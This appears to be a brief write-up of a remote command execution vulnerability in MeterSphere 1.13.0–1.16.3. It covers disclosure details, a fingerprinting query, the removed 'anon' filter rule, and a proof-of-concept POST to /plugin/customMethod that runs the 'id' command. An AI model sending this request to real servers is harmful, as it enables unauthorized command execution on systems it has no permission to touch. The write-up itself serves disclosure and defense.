Metersphere Custommethod Remote Command Execution Vulnerability
Metersphere Custommethod Remote Command Execution Vulnerability
MeterSphere customMethod remote command execution vulnerability
Vulnerability Description
On January 5, 2022, the Chuangyu 404 Active Defense Experimental Team discovered a vulnerability in the MeterSphere open source continuous testing platform and provided feedback to the MeterSphere R&D team.
Vulnerability Impact
MeterSphere v1.13.0 - v1.16.3
Network surveying and mapping
app=”MeterSphere”
Vulnerability reappears
Login page
According to the official fix, you can see that the current version of the fix is a deleted code snippet
filterChainDefinitionMap.put(“/plugin/**”, “anon”);
1
https://github.com/metersphere/metersphere/pull/9140/files
View file /backend/src/main/java/io/metersphere/controller/PluginController.java
Send a request packet
1
2
3
POST /plugin/customMethod
{"entry":"Evil","request":"id"}
This post is licensed under CC BY 4.0 by the author.